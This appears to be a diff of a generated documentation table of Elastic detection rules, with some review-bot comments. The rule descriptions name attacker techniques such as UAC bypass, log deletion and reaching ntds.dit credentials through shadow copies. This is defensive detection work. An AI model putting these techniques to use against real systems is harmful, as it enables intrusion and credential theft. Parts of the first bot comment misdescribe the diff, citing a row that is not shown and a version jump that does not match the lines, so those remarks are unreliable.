-|<<suspicious-sysctl-file-event, Suspicious Sysctl File Event>> |Monitors file events on sysctl configuration files (e.g., /etc/sysctl.conf, /etc/sysctl.d/*.conf) to identify potential unauthorized access or manipulation of system-level configuration settings. 
Attackers may tamper with the sysctl configuration files to modify kernel parameters, potentially compromising system stability, performance, or security. |[OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.3.0 |3 +|<<suspicious-system-commands-executed-by-previously-unknown-executable, Suspicious System Commands Executed by Previously Unknown Executable>> |This rule monitors for the execution of several commonly used system commands executed by a previously unknown executable located in commonly abused directories. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to run malicious code. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |103 -|<<suspicious-system-commands-executed-by-previously-unknown-executable, Suspicious System Commands Executed by Previously Unknown Executable>> |This rule monitors for the execution of several commonly used system commands executed by a previously unknown executable located in commonly abused directories. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to run malicious code. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.4.0 |2 +|<<suspicious-termination-of-esxi-process, Suspicious Termination of ESXI Process>> |Identifies instances where VMware processes, such as "vmware-vmx" or "vmx," are terminated on a Linux system by a "kill" command. The rule monitors for the "end" event type, which signifies the termination of a process. The presence of a "kill" command as the parent process for terminating VMware processes may indicate that a threat actor is attempting to interfere with the virtualized environment on the targeted system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Data Source: Elastic Defend] |8.5.0 |4 -|<<suspicious-termination-of-esxi-process, Suspicious Termination of ESXI Process>> |Identifies instances where VMware processes, such as "vmware-vmx" or "vmx," are terminated on a Linux system by a "kill" command. The rule monitors for the "end" event type, which signifies the termination of a process. The presence of a "kill" command as the parent process for terminating VMware processes may indicate that a threat actor is attempting to interfere with the virtualized environment on the targeted system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Data Source: Elastic Defend] |8.5.0 |3 +|<<suspicious-troubleshooting-pack-cabinet-execution, Suspicious Troubleshooting Pack Cabinet Execution>> |Identifies the execution of the Microsoft Diagnostic Wizard to open a diagcab file from a suspicious path and with an unusual parent process. This may indicate an attempt to execute malicious Troubleshooting Pack Cabinet files. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 -|<<suspicious-utility-launched-via-proxychains, Suspicious Utility Launched via ProxyChains>> |This rule monitors for the execution of suspicious linux tools through ProxyChains. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |1 +|<<suspicious-utility-launched-via-proxychains, Suspicious Utility Launched via ProxyChains>> |This rule monitors for the execution of suspicious linux tools through ProxyChains. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |2 |<<suspicious-wmi-event-subscription-created, Suspicious WMI Event Subscription Created>> |Detects the creation of a WMI Event Subscription. Attackers can abuse this mechanism for persistence or to elevate to SYSTEM privileges. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Sysmon Only] |8.8.0 |105 |<<suspicious-wmi-image-load-from-ms-office, Suspicious WMI Image Load from MS Office>> |Identifies a suspicious image load (wmiutils.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where child processes are spawned via Windows Management Instrumentation (WMI). This technique can be used to execute code and evade traditional parent/child processes spawned from Microsoft Office products. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<suspicious-wmic-xsl-script-execution, Suspicious WMIC XSL Script Execution>> |Identifies WMIC allowlist bypass techniques by alerting on suspicious execution of scripts. When WMIC loads scripting libraries it may be indicative of an allowlist bypass. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 +|<<suspicious-wmic-xsl-script-execution, Suspicious WMIC XSL Script Execution>> |Identifies WMIC allowlist bypass techniques by alerting on suspicious execution of scripts. When WMIC loads scripting libraries it may be indicative of an allowlist bypass. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |106 -|<<suspicious-werfault-child-process, Suspicious WerFault Child Process>> |A suspicious WerFault child process was detected, which may indicate an attempt to run via the SilentProcessExit registry key manipulation. Verify process details such as command line, network connections and file writes. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<suspicious-werfault-child-process, Suspicious WerFault Child Process>> |A suspicious WerFault child process was detected, which may indicate an attempt to run via the SilentProcessExit registry key manipulation. Verify process details such as command line, network connections and file writes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<suspicious-zoom-child-process, Suspicious Zoom Child Process>> |A suspicious Zoom child process was detected, which may indicate an attempt to run unnoticed. Verify process details such as command line, network connections, file writes and associated file signature details as well. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<suspicious-windows-process-cluster-spawned-by-a-host, Suspicious Windows Process Cluster Spawned by a Host>> |A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same host name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. 
|[Use Case: Living off the Land Attack Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Defense Evasion] |8.9.0 |1 + +|<<suspicious-windows-process-cluster-spawned-by-a-parent-process, Suspicious Windows Process Cluster Spawned by a Parent Process>> |A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same parent process name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. |[Domain: Endpoint], [OS: Windows], [Use Case: Living off the Land Attack Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Defense Evasion] |8.9.0 |1 + +|<<suspicious-windows-process-cluster-spawned-by-a-user, Suspicious Windows Process Cluster Spawned by a User>> |A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same user name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Living off the Land Attack Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Defense Evasion] |8.9.0 |1 + +|<<suspicious-zoom-child-process, Suspicious Zoom Child Process>> |A suspicious Zoom child process was detected, which may indicate an attempt to run unnoticed. Verify process details such as command line, network connections, file writes and associated file signature details as well. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 |<<suspicious-macos-ms-office-child-process, Suspicious macOS MS Office Child Process>> |Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, and Excel). These child processes are often launched during exploitation of Office applications or by documents with malicious macros. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Defend] |8.3.0 |104 -|<<suspicious-which-enumeration, Suspicious which Enumeration>> |This rule monitors for the usage of the which command with an unusual amount of process arguments. Attackers may leverage the which command to enumerate the system for useful installed utilities that may be used after compromising a system to escalate privileges or move latteraly across the network. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<suspicious-which-enumeration, Suspicious which Enumeration>> |This rule monitors for the usage of the which command with an unusual amount of process arguments. 
Attackers may leverage the which command to enumerate the system for useful installed utilities that may be used after compromising a system to escalate privileges or move latteraly across the network. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 |<<svchost-spawning-cmd, Svchost spawning Cmd>> |Identifies a suspicious parent child process relationship with cmd.exe descending from svchost.exe |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |207 -|<<symbolic-link-to-shadow-copy-created, Symbolic Link to Shadow Copy Created>> |Identifies the creation of symbolic links to a shadow copy. Symbolic links can be used to access files in the shadow copy, including sensitive files such as ntds.dit, System Boot Key and browser offline credentials. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<symbolic-link-to-shadow-copy-created, Symbolic Link to Shadow Copy Created>> |Identifies the creation of symbolic links to a shadow copy. Symbolic links can be used to access files in the shadow copy, including sensitive files such as ntds.dit, System Boot Key and browser offline credentials. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<system-binary-copied-and-or-moved-to-suspicious-directory, System Binary Copied and/or Moved to Suspicious Directory>> |This rule monitors for the copying or moving of a system binary to a suspicious directory. Adversaries may copy/move and rename system binaries to evade detection. 
Copying a system binary to a different location should not occur often, so if it does, the activity should be investigated. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |1 +|<<system-binary-copied-and-or-moved-to-suspicious-directory, System Binary Copied and/or Moved to Suspicious Directory>> |This rule monitors for the copying or moving of a system binary to a suspicious directory. Adversaries may copy/move and rename system binaries to evade detection. Copying a system binary to a different location should not occur often, so if it does, the activity should be investigated. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |2 |<<system-hosts-file-access, System Hosts File Access>> |Identifies the use of built-in tools to read the contents of \etc\hosts on a local machine. Attackers may use this data to discover remote machines in an environment that may be used for Lateral Movement from the current system. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 |<<system-information-discovery-via-windows-command-shell, System Information Discovery via Windows Command Shell>> |Identifies the execution of discovery commands to enumerate system information, files, and folders using the Windows Command Shell. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |7 -|<<system-log-file-deletion, System Log File Deletion>> |Identifies the deletion of sensitive Linux system logs. This may indicate an attempt to evade detection or destroy forensic evidence on a system. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<system-log-file-deletion, System Log File Deletion>> |Identifies the deletion of sensitive Linux system logs. This may indicate an attempt to evade detection or destroy forensic evidence on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<system-network-connections-discovery, System Network Connections Discovery>> |Adversaries may attempt to get a listing of network connections to or from a compromised system. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 
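Review bot: the new Suspicious Windows Process Cluster Spawned by a Host row is missing the `[Domain: Endpoint], [OS: Windows]` tags that its two sibling rows in this hunk (Spawned by a Parent Process, Spawned by a User) carry, so three rows describing the same ML job combination disagree on their tags; add the two tags to the Host row (or drop them from the other two) so the trio matches. All three rows also carry both `[Rule Type: ML]` and `[Rule Type: Machine Learning]`, which read as two spellings of one tag and should be collapsed to whichever the rest of the table uses. Further down the hunk, the Suspicious which Enumeration row keeps the typo "latteraly" (laterally) in both its removed and added line while its OS tag moves from Windows to Linux; the typo lives in the rule description, so it needs a fix in the rule source rather than in this generated page. Two smaller points: the blank `+` line inserted before the Suspicious Symbolic Link Created row is not used between the neighbouring rows of this table, and the Suspicious Sysctl File Event and Suspicious System Commands Executed by Previously Unknown Executable rows jump from versions 3 and 2 to 103 in the same lines where their min-stack column moves to 8.6.0, so a sentence in the PR description confirming that the version jump is tied to the min-stack change and not to a content change would save the next reader the question.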
@@ -1698,7 +1766,7 @@ and their rule type is `machine_learning`. |<<system-service-discovery-through-built-in-windows-utilities, System Service Discovery through built-in Windows Utilities>> |Detects the usage of commonly used system service discovery techniques, which attackers may use during the reconnaissance phase after compromising a system in order to gain a better understanding of the environment and/or escalate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Rule Type: BBR] |8.3.0 |5 -|<<system-shells-via-services, System Shells via Services>> |Windows services typically run as SYSTEM and can be used as a privilege escalation opportunity. Malware or penetration testers may run a shell as a service to gain SYSTEM permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<system-shells-via-services, System Shells via Services>> |Windows services typically run as SYSTEM and can be used as a privilege escalation opportunity. Malware or penetration testers may run a shell as a service to gain SYSTEM permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<system-time-discovery, System Time Discovery>> |Detects the usage of commonly used system time discovery techniques, which attackers may use during the reconnaissance phase after compromising a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Rule Type: BBR] |8.3.0 |5 
@@ -1706,11 +1774,13 @@ and their rule type is `machine_learning`. |<<tcc-bypass-via-mounted-apfs-snapshot-access, TCC Bypass via Mounted APFS Snapshot Access>> |Identifies the use of the mount_apfs command to mount the entire file system through Apple File System (APFS) snapshots as read-only and with the noowners flag set. This action enables the adversary to access almost any file in the file system, including all user data and files protected by Apple’s privacy framework (TCC). |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |104 +|<<tainted-kernel-module-load, Tainted Kernel Module Load>> |This rule monitors the syslog log file for messages related to instances of a tainted kernel module load. Rootkits often leverage kernel modules as their main defense evasion technique. Detecting tainted kernel module loads is crucial for ensuring system security and integrity, as malicious or unauthorized modules can compromise the kernel and lead to system vulnerabilities or unauthorized access. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence] |8.3.0 |1 + |<<tampering-of-bash-command-line-history, Tampering of Bash Command-Line History>> |Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |103 -|<<temporarily-scheduled-task-creation, Temporarily Scheduled Task Creation>> |Indicates the creation and deletion of a scheduled task within a short time interval. Adversaries can use these to proxy malicious execution via the schedule service and perform clean up. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence] |8.3.0 |6 +|<<temporarily-scheduled-task-creation, Temporarily Scheduled Task Creation>> |Indicates the creation and deletion of a scheduled task within a short time interval. Adversaries can use these to proxy malicious execution via the schedule service and perform clean up. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution] |8.3.0 |7 -|<<third-party-backup-files-deleted-via-unexpected-process, Third-party Backup Files Deleted via Unexpected Process>> |Identifies the deletion of backup files, saved using third-party software, by a process outside of the backup suite. Adversaries may delete Backup files to ensure that recovery from a ransomware attack is less likely. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<third-party-backup-files-deleted-via-unexpected-process, Third-party Backup Files Deleted via Unexpected Process>> |Identifies the deletion of backup files, saved using third-party software, by a process outside of the backup suite. Adversaries may delete Backup files to ensure that recovery from a ransomware attack is less likely. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<threat-intel-hash-indicator-match, Threat Intel Hash Indicator Match>> |This rule is triggered when a hash indicator from the Threat Intel Filebeat module or integrations has a match against an event that contains file hashes, such as antivirus alerts, process creation, library load, and file operation events. |[OS: Windows], [Data Source: Elastic Endgame], [Rule Type: Indicator Match] |8.5.0 |4 
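Review bot: The new Tainted Kernel Module Load row carries no `[Data Source: ...]` tag even though its description says it monitors the syslog log file, while every neighbouring row names its source (`[Data Source: Elastic Defend]` or `[Data Source: Elastic Endgame]`); add the data-source tag so users can filter by integration. The same row also tags only `[Tactic: Persistence]` while the description frames kernel modules as a rootkit's "main defense evasion technique"; either add `[Tactic: Defense Evasion]` or reword the description to match the mapping.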
@@ -1724,45 +1794,49 @@ and their rule type is `machine_learning`. |<<trap-signals-execution, Trap Signals Execution>> |Identify activity related where adversaries can include a trap command which then allows programs and shells to specify commands that will be executed upon receiving interrupt signals. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 -|<<uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer, UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer>> |Identifies User Account Control (UAC) bypass attempts by abusing an elevated COM Interface to launch a malicious program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer, UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer>> |Identifies User Account Control (UAC) bypass attempts by abusing an elevated COM Interface to launch a malicious program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<uac-bypass-attempt-via-privileged-ifileoperation-com-interface, UAC Bypass Attempt via Privileged IFileOperation COM Interface>> |Identifies attempts to bypass User Account Control (UAC) via DLL side-loading. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<uac-bypass-attempt-via-privileged-ifileoperation-com-interface, UAC Bypass Attempt via Privileged IFileOperation COM Interface>> |Identifies attempts to bypass User Account Control (UAC) via DLL side-loading. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<uac-bypass-attempt-via-windows-directory-masquerading, UAC Bypass Attempt via Windows Directory Masquerading>> |Identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<uac-bypass-attempt-via-windows-directory-masquerading, UAC Bypass Attempt via Windows Directory Masquerading>> |Identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface, UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface>> |Identifies attempts to bypass User Account Control (UAC) by abusing an elevated COM Interface to launch a rogue Windows ClipUp program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface, UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface>> |Identifies attempts to bypass User Account Control (UAC) by abusing an elevated COM Interface to launch a rogue Windows ClipUp program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<uac-bypass-via-diskcleanup-scheduled-task-hijack, UAC Bypass via DiskCleanup Scheduled Task Hijack>> |Identifies User Account Control (UAC) bypass via hijacking DiskCleanup Scheduled Task. Attackers bypass UAC to stealthily execute code with elevated permissions. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<uac-bypass-via-diskcleanup-scheduled-task-hijack, UAC Bypass via DiskCleanup Scheduled Task Hijack>> |Identifies User Account Control (UAC) bypass via hijacking DiskCleanup Scheduled Task. Attackers bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<uac-bypass-via-icmluautil-elevated-com-interface, UAC Bypass via ICMLuaUtil Elevated COM Interface>> |Identifies User Account Control (UAC) bypass attempts via the ICMLuaUtil Elevated COM interface. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<uac-bypass-via-icmluautil-elevated-com-interface, UAC Bypass via ICMLuaUtil Elevated COM Interface>> |Identifies User Account Control (UAC) bypass attempts via the ICMLuaUtil Elevated COM interface. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<uac-bypass-via-windows-firewall-snap-in-hijack, UAC Bypass via Windows Firewall Snap-In Hijack>> |Identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<uac-bypass-via-windows-firewall-snap-in-hijack, UAC Bypass via Windows Firewall Snap-In Hijack>> |Identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<unauthorized-access-to-an-okta-application, Unauthorized Access to an Okta Application>> |Identifies unauthorized access attempts to Okta applications. |[Tactic: Initial Access], [Use Case: Identity and Access Audit], [Data Source: Okta] |8.3.0 |105 +|<<unauthorized-access-to-an-okta-application, Unauthorized Access to an Okta Application>> |Identifies unauthorized access attempts to Okta applications. |[Tactic: Initial Access], [Use Case: Identity and Access Audit], [Data Source: Okta] |8.10.0 |206 |<<uncommon-registry-persistence-change, Uncommon Registry Persistence Change>> |Detects changes to registry persistence keys that are not commonly used or modified by legitimate programs. This could be an indication of an adversary's attempt to persist in a stealthy manner. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |105 |<<unexpected-child-process-of-macos-screensaver-engine, Unexpected Child Process of macOS Screensaver Engine>> |Identifies when a child process is spawned by the screensaver engine process, which is consistent with an attacker's malicious payload being executed after the screensaver activated on the endpoint. 
An adversary can maintain persistence on a macOS endpoint by creating a malicious screensaver (.saver) file and configuring the screensaver plist file to execute code each time the screensaver is activated. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<unsigned-dll-loaded-by-svchost, Unsigned DLL Loaded by Svchost>> |Identifies an unsigned library created in the last 5 minutes and subsequently loaded by a shared windows service (svchost). Adversaries may use this technique to maintain persistence or run with System privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.4.0 |4 +|<<unix-socket-connection, Unix Socket Connection>> |This rule monitors for inter-process communication via Unix sockets. Adversaries may attempt to communicate with local Unix sockets to enumerate application details, find vulnerabilities/configuration mistakes and potentially escalate privileges or set up malicious communication channels via Unix sockets for inter-process communication to attempt to evade detection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 + +|<<unsigned-bits-service-client-process, Unsigned BITS Service Client Process>> |Identifies an unsigned Windows Background Intelligent Transfer Service (BITS) client process. Attackers may abuse BITS functionality to download or upload data using the BITS service. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 + +|<<unsigned-dll-loaded-by-svchost, Unsigned DLL Loaded by Svchost>> |Identifies an unsigned library created in the last 5 minutes and subsequently loaded by a shared windows service (svchost). 
